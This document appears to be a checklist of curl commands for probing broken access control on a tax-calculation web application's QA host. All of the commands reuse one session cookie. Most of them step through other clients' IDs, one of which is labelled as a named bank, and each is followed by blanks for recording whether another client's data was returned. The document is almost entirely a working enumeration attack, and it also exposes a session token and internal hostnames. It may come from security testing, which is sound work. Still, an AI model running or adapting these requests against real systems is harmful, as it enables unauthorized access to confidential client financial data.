TEST 1 - Your own transaction (baseline):
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/CalcTransactionHistory?calcTransactionId=sbFc4QhaUMsiRgsXMs3wtE6MrJprAHiGweLDrdJPyw9OCqw"

REPORT: HTTP _____ | Got data: YES/NO


TEST 2 - ID 741 (known good):
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=741&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 3 - ID 1 (try enumeration):
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=1&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 4 - ID 10:
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=10&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 5 - ID 30 (Bank of America):
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=30&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 6 - ID 50:
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=50&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 7 - ID 100:
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=100&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

TEST 8 - ID 500:
curl -b "TC-BAC-DEV=q11ok23cvmbx2it25qbjhejc" "https://qa.gmsgetb.kpmglinkgo.com/gettaxcalcbac/ClientTaxLogic?id=500&logicType=subPlan"

REPORT: HTTP _____ | Got data: YES/NO | Client: _____

